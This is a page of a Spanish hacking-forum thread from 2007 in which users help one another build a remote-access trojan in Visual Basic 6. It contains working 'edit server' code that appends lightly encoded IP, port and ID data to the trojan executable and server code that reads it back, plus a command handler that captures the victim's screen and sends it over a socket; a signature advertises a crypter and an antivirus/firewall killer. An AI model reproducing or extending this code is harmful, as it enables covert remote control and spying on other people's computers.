elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Mi primer troyano en VB6.0
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 [4] 5 Ir Abajo Respuesta Imprimir
Autor Tema: Mi primer troyano en VB6.0  (Leído 23,008 veces)
wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
Re: Mi primer troyano en VB6.0
« Respuesta #30 en: 27 Julio 2007, 16:30 pm »

yo lo que ago para el editserver es cargar el server en el cliente como recurso. luego lo extraigo, le meto la ip, puerto y luego unos valores, Verdadero falso. luego el server lee esos valores y aplica lo que sea.


En línea

yovaninu


Desconectado Desconectado

Mensajes: 349



Ver Perfil
Re: Mi primer troyano en VB6.0
« Respuesta #31 en: 28 Julio 2007, 16:12 pm »

haber si mirando mi viejo editor de server te ayuda en algo

diseñas un form parecido a esto:


Código
  1. Dim finta As Boolean
  2. Dim i1 As Integer
  3. Dim Primera, Segunda As String
  4. Dim MICAdena As String
  5. Private Sub Command1_Click()
  6. Me.MousePointer = 11
  7. hacerlo
  8. Me.MousePointer = 0
  9. End Sub
  10.  
  11. Private Sub Command2_Click() 'solo para el test!
  12. On Error Resume Next
  13. If Len(Text1) = 0 Or Len(Text2) = 0 Or Len(Text7) = 0 Then
  14.    MsgBox "Can`t continue...", vbCritical + vbOKOnly, "Falta parámetros..."
  15. Else
  16.    Command1.Enabled = True
  17. End If
  18. End Sub
  19.  
  20.  
  21.  
  22.  
  23.  
  24. Private Sub Command3_Click()
  25. CD.Filter = "Server (*.exe)|*.exe"
  26. CD.ShowOpen
  27. Text8 = CD.FileName
  28. End Sub
  29.  
  30.  
  31.  
  32.  
  33. Sub hacerlo()
  34. Dim puerto, host, IdServer As String
  35. Dim lp, lh, lt, li As Integer
  36. Dim DataToAdd As String
  37. Dim DataEncrypted As String
  38.  
  39.    puerto = Text1.Text
  40.    host = Text2.Text
  41.    IdServer = Text7.Text
  42.  
  43.  
  44.    lp = Len(puerto)
  45.    lh = Len(host)
  46.    li = Len(IdServer)
  47.    lt = lp + lh + li
  48.    'MsgBox (App.Path)
  49.    DataToAdd = Trim(puerto) & "/" & Trim(host) & "/" & Trim(IdServer) & "/"
  50.    DataEncrypted = EncodeW(DataToAdd)
  51.  
  52.    'Open App.Path & "\taskmgrs.exe" For Binary As #1 '//abrimos el archivo en forma binaria.
  53.    Open Text8.Text For Binary As #1 '//abrimos el archivo en forma binaria.
  54.  
  55.       Seek (1), LOF(1) + 1 'nos vamos al final del archivo
  56.       Put #1, , DataEncrypted & Trim(Str(lt))
  57.    Close #1
  58.    MsgBox ("El servidor ha sido generado corréctamente (Encrypted)")
  59.    End
  60.  
  61. End Sub
  62.  
  63. 'modulo para ocultar un poco los datos añadidos al final del servidor
  64. Function EncodeW(TextToE As String) As String
  65. Dim i As Integer
  66. Dim cad As String * 1
  67. Dim Texto(200) As String
  68. Dim Encrip(200) As String
  69. Dim TextReturn As String
  70. For i = 1 To Len(TextToE)
  71.   cad = Right(TextToE, i)
  72.   Texto(i) = Left(cad, 1)
  73. Next
  74.  
  75. For i = Len(TextToE) To 1 Step -1
  76.  Encrip(i) = Chr(Asc(Texto(i)) + 1)
  77.  TextReturn = TextReturn & Encrip(i)
  78. Next
  79. EncodeW = TextReturn
  80. End Function
  81.  

con eso agregas esos datos al final del server, y en el codigo del server tendrias que poner algo asi, (en el form load del server)


Código
  1.  
  2. ArrayCritico() As String 'esto en general
  3.  
  4. On Error GoTo error:
  5. Dim DataRealD As String
  6. Dim nd, nd1 As String
  7.  
  8. nd = Right(filedata, 2)
  9.  
  10. nd1 = Right(filedata, Val(nd) + 5)
  11.  
  12. MsgBox (nd)
  13. MsgBox (nd1)
  14.  
  15.  
  16. DataRealD = DecodeW(nd1) 'traducimos
  17.  
  18.  
  19. MsgBox ArrayCritico(0) 'puerto
  20. MsgBox ArrayCritico(1) 'host
  21. MsgBox ArrayCritico(2) 'id del server (simple identificador)
  22. MsgBox ArrayCritico(3) 'numero de caracteres escritos al final del exe
  23.  
  24. Port = Val(ArrayCritico(0))
  25. Ip = ArrayCritico(1)
  26. error:
  27. End Sub
  28.  

en donde se ve que hay una funcioncilla "decodew" que va asi:
Código
  1. Function DecodeW(TextToD As String) As String
  2. Dim TextDReturn As String
  3. Dim i As Integer
  4.  
  5. Dim cad As String * 1
  6. Dim TextoEncriptado(200) As String
  7. For i = 1 To Len(TextToD)
  8.   cad = Right(TextToD, i)
  9.   TextoEncriptado(i) = Left(cad, 1)
  10. Next
  11.  
  12. For i = Len(TextToD) To 1 Step -1
  13.  TextDReturn = TextDReturn & Chr((Asc(TextoEncriptado(i))) - 1)
  14. Next
  15. DecodeW = TextDReturn
  16. End Function
  17.  

ojala me hayas entendido  ;D

Oops! me falto decirte que para probarlo tienes que tener el exe de tu servidor, si lo pruebas desde basic no funciona.

Un saludo


« Última modificación: 28 Julio 2007, 16:14 pm por yovaninu » En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Mi primer troyano en VB6.0
« Respuesta #32 en: 28 Julio 2007, 16:42 pm »

La idea si no me ekivoko es esta: Poner al final del server los datos de la IP, el puerto, etc... (si van cifrados mejor), después el server lo k hace es leer estos valores que estan al final y guardarlos en variables y ya estaría no??? Corrijanme si me ekivoko...lo k no entiendo es como el server lee despues eses valores, pues en el código que has puesto en el server no hay ninguna instruccion "Open" que se abra a si mismo, debe ser que estoy yo confundido, no entiendo de donde sacas la variable "filedata" ni donde estableces los valores de "ArrayCritico"

Gracias de todos modos, si es como yo pienso ya voy teniendo una idea algo más clara...

Saludos y gracias ;)

P.D.: Wactor, aún no tuve tiempo de mirar el tuyo, lo siento...
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
yovaninu


Desconectado Desconectado

Mensajes: 349



Ver Perfil
Re: Mi primer troyano en VB6.0
« Respuesta #33 en: 28 Julio 2007, 22:26 pm »

que distraido tienes razon:
éste código va al principio dentro del form load
Código
  1. Open App.Path & "\" & App.EXEName & ".exe" For Binary As #2  
  2.  filedata = Input(LOF(2), #2)
  3. Close #2
  4.  



en conclusion el load del form del server para esta parte de tu troyano debe quedat asi:
Código
  1. Open App.Path & "\" & App.EXEName & ".exe" For Binary As #2  
  2. filedata = Input(LOF(2), #2)
  3. Close #2
  4.  
  5. Dim DataRealD As String
  6. Dim nd, nd1 As String
  7.  
  8. nd = Right(filedata, 2)
  9.  
  10. nd1 = Right(filedata, Val(nd) + 5)
  11.  
  12.  
  13. DataRealD = DecodeW(nd1)
  14. ArrayCritico = Split(DataRealD, "/")
  15.  
  16. 'esto es sólo para verlo
  17. MsgBox ArrayCritico(0) 'puerto
  18. MsgBox ArrayCritico(1) 'host
  19. MsgBox ArrayCritico(2) 'id del server (simple identificador)
  20. MsgBox ArrayCritico(3) 'numero de caracteres escritos al final del exe
  21.  
  22. Port = Val(ArrayCritico(0))
  23. Ip = ArrayCritico(1)
  24.  
  25.  
  26.  
En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Mi primer troyano en VB6.0
« Respuesta #34 en: 29 Julio 2007, 04:50 am »

Ya me parecía, gracias, ya me quedó bastante clara la idea del edit-server.

Weno, si teneis información sobre cosas que pueda añadir a mi troyano o asi decidmelo...toda ayuda será bienvenida. SAludos ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Mi primer troyano en VB6.0
« Respuesta #35 en: 31 Julio 2007, 17:41 pm »

WACTOR, tu me pusiste este code:

Código
  1. Case "Screen"
  2. Resolucion = vData(1)
  3. Foto.SetSamplingFrequencies 2, 2, 2, 2, 2, 2
  4. Foto.Quality = Resolucion   'aqui ajustas la calidad dsd 1 a 100 hasi bajas calidad bajas peso
  5. Foto.SampleScreen
  6. Foto.SaveFile ("c:\capture.jpg")
  7. ws.SendData "tamscreen|" & FileLen("C:\capture.jpg")

Pero mi clase (cJPEG.cls) no tiene el método "SampleScreen", pero tiene uno llamado "SampleHDC":

Código
  1. Public Function SampleHDC(ByVal lHDC As Long, ByVal lWidth As Long, ByVal lHeight As Long, [ByVal lSrcLeft As Long = 0], [ByVal lSrcTop As Long = 0]) As Long

Esa es la funcion con los parametros k tengo k pasar, lHeight y lWidth se refieren al tamaño de la imagen, los opcionales no hacen falta, lo uniko k se para k sirve es lHDC...es necesario, si no se define despues el método "SavePicture" fallará...


Weno, lo k me gustaría k me explicarais una cosa referente a cJPEG, estas son sus propiedades:

X.Comment --> Sirve para poner un comentario
X.Quality --> La calidad de la imagen del 1 al 100

y estos sus métodos:

X.SetSamplingFrequencies --> Sirve tambien para determinar la calidad (comprension)
X.SampleHDC --> No se para k sirve, pero solo se le pasan números
X.SaveFile --> Sirve para guardar el archivo en JPEG, solo se le pasa la ruta donde se guardará el archivo


Mi pregunta es donde defino el archivo k quiero convertir??? En las propiedades está claro k no, en "Set SamplinFrecuencies" solo se le pasan 4 numeron k definen la calidad, en "SampleHDC" solo se le pasan 3 numeros, dos de ellos representan el tamaño y el otro es uno k no se para k sirve, pero es un Long, no puede contener el archivo...
En "SaveFile" solo se pasa la ruta donde se guardará el archivo...pero como se pasa el archivo que se guardará? como save la clase cual es el archivo k tiene k comprimir a JPEG???

Weno, a ver si alguien me puede ayudar

Saludos ;)

P.D.: Aki la clase k yo utilizo http://www.megaupload.com/es/?d=AJWKTIUY

Trae un ejemplo de komo se utiliza, de aí fue de donde saké las conclusiones k puse antes, pero no supe saber como funcionaba...En el ejemplo funciona perfectamente.
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
Re: Mi primer troyano en VB6.0
« Respuesta #36 en: 31 Julio 2007, 20:01 pm »

weno pos si esperas un momento te usbo el modulo de clase que tengo yo, por que no tengo ni idea de porque hay dos modulos cjpg distintos.

http://www.megaupload.com/es/?d=X7PSVCSJ

mira  aver si con este te funciona
« Última modificación: 31 Julio 2007, 20:24 pm por wACtOr » En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Mi primer troyano en VB6.0
« Respuesta #37 en: 31 Julio 2007, 22:11 pm »

Voy a provarlo ahora, ya te diré y gracias...pero aún asi sigo sin entender pork el otro no funciona...  :-\ :-\

Saludos ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Mi primer troyano en VB6.0
« Respuesta #38 en: 31 Julio 2007, 23:01 pm »

Donde pone la version y fecha es exactamente la misma, debió de cojer alguna persona una y modificarla...por ejemplo en la mia hay una propiedad que permite establecer un comentario a la imagen, pero no puedo hacer capturas de pantalla pork no tiene la funcion "SampleScreen"...

Voy a usar la tuya ya k para lo k yo quiero es mejor...

Aún así me sigue kedando una duda...como hago para convertir a JPEG un archivo existente?

Saludos ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Mi primer troyano en VB6.0
« Respuesta #39 en: 2 Agosto 2007, 16:50 pm »

Weno, me funciona bastante bien tu cJPEG...lo malo es k tarda bastante en hacer una captura de pantalla...pero eso es solo en modo prueva, una vez compilado lo hace rápido...

Por cierto, la funcion "SetSamplingFrecuencies" se k sirve para ajustar la calidad...pero como exactamente?

Y habría na manera de poner definir los BITS y la resolucion de la imagen

Por ejemplo en vez de 24bits cojer capturas a 16 o 8 bits...tambien me gustaría poner definir la resolucion de las capturas, se puede??

Saludos ;)
« Última modificación: 2 Agosto 2007, 16:52 pm por nhaalclkiemr » En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
Páginas: 1 2 3 [4] 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Primer troyano para MAC que detecta la virtualización
Noticias
wolfbcn 0 1,269 Último mensaje 17 Octubre 2011, 13:29 pm
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines